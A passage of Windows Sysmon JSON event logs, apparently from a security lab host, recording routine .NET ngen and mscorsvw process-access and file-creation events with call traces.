Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.650","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001062010C00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6418,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.650\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001062010C00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.650","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001062010C00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6419,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.665\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001062010C00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.665","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001062010C00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6420,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.743\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-0010D7040C00}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.743","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-0010D7040C00}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6421,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.743\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-0010D7040C00}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.743","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-0010D7040C00}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6422,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.743\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-0010D7040C00}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.743","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-0010D7040C00}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6423,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:20.884\r\nProcessGuid: {A837DB8D-0440-5F25-0000-0010D7040C00}\r\nProcessId: 3000\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb8-0\\System.Configuration.Install.dll\r\nCreationUtcTime: 2020-08-01 05:57:20.884","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:20.884","ProcessGuid":"{A837DB8D-0440-5F25-0000-0010D7040C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb8-0\\System.Configuration.Install.dll","CreationUtcTime":"2020-08-01 05:57:20.884","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6424,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.915\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001048090C00}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.915","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001048090C00}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6425,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.915\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001048090C00}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.915","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001048090C00}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6426,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.915\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001048090C00}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 